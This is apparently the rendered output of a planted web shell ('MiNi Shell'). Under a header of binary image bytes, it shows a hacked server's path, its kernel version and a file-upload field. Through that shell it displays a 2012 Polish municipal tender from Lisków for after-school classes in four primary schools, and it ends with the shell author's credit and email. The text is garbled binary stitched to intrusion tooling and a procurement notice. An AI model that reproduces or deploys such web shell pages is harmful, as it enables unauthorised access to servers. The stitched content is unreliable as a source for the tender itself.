JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121011/393940-N-2012.html

<p class="kh_header"><b>Lisków: Usługi  edukacyjne   obejmujące  przeprowadzenie  zajęć  dla uczennic i uczniów w klasach I-III  przez   nauczycieli  w  ramach  projektu pn. Szansa na lepszy rozwój</b><br>
<b>Numer ogłoszenia: 393940 - 2012; data zamieszczenia: 11.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lisków , ul. ks. Wacława Blizińskiego 56, 62-850 Lisków, woj. wielkopolskie, tel. 0-62 7634 114, faks 0-62 7634 021.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.liskow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi  edukacyjne   obejmujące  przeprowadzenie  zajęć  dla uczennic i uczniów w klasach I-III  przez   nauczycieli  w  ramach  projektu pn. Szansa na lepszy rozwój.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi edukacyjne obejmujące przeprowadzenie zajęć dla uczennic i uczniów w klasach I - III  przez nauczycieli w ramach projektu  pn. Szansa  na  lepszy  rozwój w roku  szkolnym  2012 / 2013  w 4 szkołach podstawowych. Projekt realizowany będzie w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów   z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.

Szczegółowy opis przedmiotu zamówienia:

Zamówienie realizowane będzie w roku szkolnym 2012/2013, do 30.06.2013 r. w następujących 4   placówkach  oświatowych  w  Gminie  Lisków: 
1.Szkoła Podstawowa  w  Liskowie,
2.Szkoła Podstawowa  w  Strzałkowie ,
3.Szkoła Podstawowa  w  Zakrzynie ,
4.Szkoła Podstawowa   w  Ciepielewie .   

Zamówienie zostało podzielone na 31 części, w zależności od miejsca wykonywania usługi oraz rodzaju zajęć pozalekcyjnych. Zamawiający dopuszcza złożenie oferty na dowolną liczbę części.

Usługi będą realizowane w/w szkołach w dniach zajęć szkolnych ( od poniedziałku do piątku), z  podziałem na zadania, składające się z nastp. części:


ZADANIE 1 - Zajęcia realizowane w Szkole Podstawowej   w  Liskowie  (1 - 7 części)

Część 1 
Zajęcia dla dzieci z trudnościami w czytaniu i pisaniu, w tym  zagrożonych  ryzykiem dysleksji łączna liczba godzin lekcyjnych  -  60 h

Część 2
Zajęcia dla dzieci  z  trudnościami  w  zdobywaniu umiejętności   matematycznych
łączna liczba godzin lekcyjnych  - 60  h

Część 3
Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy łączna liczba godzin lekcyjnych -60 h

Część 4
Zajęcia   z  gimnastyki  korekcyjnej dla dzieci  z  wadami  postawy łączna liczba godzin lekcyjnych - 60  h

Część 5
Zajęcia matematyczno - przyrodnicze, rozwijające zainteresowania  uczniów  szczególnie uzdolnionych łączna liczba godzin   lekcyjnych - 30 h

Część 6 
Zajęcia wokalno-muzyczne, rozwijające zainteresowania uczniów szczególnie uzdolnionych łączna liczba godzin lekcyjnych  - 60 h

Część  7
Zajęcia artystyczne , rozwijające  zainteresowania  uczniów  szczególnie   uzdolnionych łączna liczba godzin lekcyjnych - 30 h

ZADANIE 2 - Zajęcia  realizowane  w Szkole   Podstawowej    w   Strzałkowie   (części   8 - 16)

Część 8  
Zajęcia dla dzieci z trudnościami w czytaniu i pisaniu , w tym zagrożonych ryzykiem dysleksji łączna liczba godzin lekcyjnych   30 h

Część 9
Zajęcia dla dzieci z trudnościami  w  zdobywaniu umiejętności matematycznych
 łączna liczba godzin lekcyjnych    30 h

Część 10
Zajęcia  z gimnastyki korekcyjno-kompensacyjnej , dla dzieci z wadami postawy
łączna liczba godzin  lekcyjnych    30 h

Część 11
Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci  z zaburzeniami komunikacji społecznej łączna liczba   godzin   lekcyjnych   30 h

Część 12
Zajęcia matematyczno-przyrodnicze, rozwijające zainteresowania uczniów szczególnie uzdolnionych łączna liczba godzin  lekcyjnych   30 h

Część 13
Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju  mowy łączna liczba godzin  lekcyjnych  - 60 h

Część 14
Zajęcia polonistyczne, rozwijające  zainteresowania  uczniów szczególnie  uzdolnionych łączna liczba godzin  lekcyjnych   30 h

Część 15
Zajęcia z języka angielskiego , rozwijające zainteresowania uczniów szczególnie uzdolnionych łączna liczba godzin  lekcyjnych    30 h

Część 16
Zajęcia artystyczne , rozwijające zainteresowania uczniów szczególnie uzdolnionych
łączna liczba godzin  lekcyjnych    30 h 

ZADANIE 3 - Zajęcia   realizowane  w Szkole   Podstawowej   w  Zakrzynie   (części 17 - 25)

Część 17 
Zajęcia dla dzieci z trudnościami w czytaniu i pisaniu , w tym zagrożonych ryzykiem dysleksji łączna  liczba  godzin  lekcyjnych   30 h

Część 18
Zajęcia  dla  dzieci  z trudnościami  w  zdobywaniu  umiejętności  matematycznych
łączna   liczba   godzin   lekcyjnych   30 h

Część 19
Zajęcia logopedyczne  dla   dzieci   z   zaburzeniami rozwoju  mowy łączna liczba godzin  lekcyjnych    60 h 

Część 20
Zajęcia  z gimnastyki korekcyjno-kompensacyjnej , dla dzieci z wadami postawy
łączna liczba godzin  lekcyjnych    30 h

Część  21
Zajęcia  z  biblioterapii  dla  dzieci  z  zaburzeniami mowy ,  koncentracji    i   zachowania łączna  liczba godzin lekcyjnych   30 h

Część  22
Zajęcia  z  muzykoterapii  i  plastykoterapii   dla  dzieci  z  zaburzeniami  mowy , koncentracji  i  zachowania łączna  liczba godzin lekcyjnych   30 h

Część 23
Zajęcia matematyczno-przyrodnicze, rozwijające zainteresowania uczniów szczególnie uzdolnionych łączna  liczba godzin lekcyjnych   30 h

Część  24
Zajęcia językowe, rozwijające zainteresowania uczniów  szczególnie uzdolnionych
łączna  liczba godzin lekcyjnych   30 h

Część  25
Zajęcia  teatralno - muzyczne,  rozwijające  zainteresowania  uczniów szczególnie  uzdolnionych łączna  liczba godzin   lekcyjnych   30 h


ZADANIE 4  -  Zajęcia   realizowane  w Szkole   Podstawowej   w  Ciepielewie  (części  26  - 31)

Część 26
Zajęcia dla dzieci z trudnościami w czytaniu i pisaniu , w tym zagrożonych ryzykiem dysleksji łączna  liczba  godzin  lekcyjnych  30 h 

Część 27
Zajęcia  dla  dzieci  z trudnościami  w  zdobywaniu  umiejętności  matematycznych
łączna   liczba   godzin   lekcyjnych   30 h

Część 28
Zajęcia logopedyczne  dla   dzieci   z   zaburzeniami    rozwoju  mowy
łączna liczba godzin  lekcyjnych    60 h 

Część 29 
Zajęcia   z  gimnastyki  korekcyjnej dla dzieci  z  wadami  postawy
łączna liczba godzin lekcyjnych - 60  h

Część 30
Zajęcia  matematyczno - przyrodnicze , rozwijające  zainteresowania  uczniów  szczególnie  uzdolnionych łączna liczba godzin lekcyjnych 30 h

Cześć 31
Zajęcia artystyczne , rozwijające  zainteresowania  uczniów  szczególnie   uzdolnionych łączna liczba godzin lekcyjnych 30 h


Zajęcia będą realizowane zgodnie z harmonogramem wskazanym przez dyrektora danej szkoły.

Zajęcia pozalekcyjne będą odbywać się w Szkołach Podstawowych wskazanych  w poszczególnych zadaniach w salach dydaktycznych, przystosowanych do prowadzenia zajęć. W ramach umowy Wykonawca oprócz prowadzenia zajęć jest zobowiązany prowadzić dokumentację związaną z zajęciami, tj. listy obecności, dzienniki zajęć, itp., jak również jest zobowiązany opracować plan i program zajęć, a także sprawować opiekę nad uczniami. Wykonawca zobowiązany jest również do przeprowadzenia i analizy wstępnych i końcowych testów kompetencji dla grupy uczniów objętych zajęciami dydaktyczno - wyrównawczymi i rozwijającymi uzdolnienia. Wykonawca zobowiązany jest do prowadzenia dokumentacji potwierdzającej realizację usługi, zgodnie z wymogami UE oraz dokumentacją POKL..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 31.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie złożonego oświadczenia (zal 2 do SIWZ) oraz dokumentów z treści których musi jednoznacznie wynikać, że Wykonawca spełnia wymagane warunki. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie złożonego oświadczenia (zal 2 do SIWZ) oraz dokumentów wymienionych w pkt VI.1 ppkt. b i c SIWZ. Wykonawcy zadań muszą spełniać następujące wymogi wspólne dla wszystkich zadań:
posiadają wymagane wykształcenie i kwalifikacje zgodnie z rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenie szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2009r. Nr 50, poz. 400) tj. wykształcenie wyższe kierunkowe, odpowiednie dla zadania, na które składają ofertę oraz przygotowanie pedagogiczne, dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, posiadają wykształcenie wyższe oraz kwalifikacje i uprawnienia do wykonywania zawodu nauczyciela zgodnie z rozporządzeniem Ministra Edukacji Narodowej,
posiadają ukończone formy doskonalenia zawodowego zgodnie z rodzajem prowadzonych zajęć i znaczące osiągnięcia na sprawdzianach i egzaminach zewnętrznych, przedstawią plan i program kształcenia dla określonej części zamówienia dostosowany do potrzeb ucznia zainteresowanego nabyciem umiejętności kluczowych opisanych w standardach kształcenia. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie złożonego oświadczenia (zal 2 do SIWZ). Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny na podstawie dokumentów zawierających informacje dotyczące kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz ofertowy (zal 1 do SIWZ)
2. Upoważnienie do podpisania oferty musi być dołączone do oferty,  jeżeli ofertę podpisuje osoba nieupoważniona.
3. Dokumenty złożone wraz z ofertą muszą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez osobę(y) uprawnioną(e) do podpisania oferty. Jeżeli do reprezentowania wykonawcy upoważnione są łącznie dwie lub więcej osób, kopie dokumentów muszą być potwierdzone za zgodność z oryginałem przez te osoby. Zamawiający może żądać przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu wyłącznie wtedy, gdy przedstawiona przez Wykonawcę kserokopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości, a Zamawiający nie może sprawdzić jej prawdziwości w inny sposób.
4. Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia (dyplomy, świadectwa  potwierdzające kwalifikacje do poszczególnych częśći zamówienia, zaświadczenia o ukończonych formach doskonalenia zawodowego), niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie  czynności, oraz informacją o podstawie do dysponowania tymi osobami.-(załącznik nr 4 do  SIWZ)
5. Plan i program kształcenia dla określonej części zamówienia dostosowany do potrzeb ucznia zainteresowanego nabyciem umiejętności kluczowych opisanych w standardach kształcenia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy zostały określone w paragrafie 11 załącznika nr 5 do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.liskow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Liskowie, ul. Ks. Wacława Blizińskiego 56, 62-850 Lisków, pokój nr 1 (I piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2012 godzina 10:00, miejsce: Urząd Gminy w Liskowie, ul. Ks. Wacława Blizińskiego 56, 62-850 Lisków, pokój nr 1 (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie związane jest z realizacją projektu pn. Szansa na lepszy rozwój w roku szkolnym 2012 /2013 w 4 szkołach dla których organem prowadzącym jest gmina Lisków. Projekt realizowany jest w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych - Nr 09.01.02-30-049/12-00..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com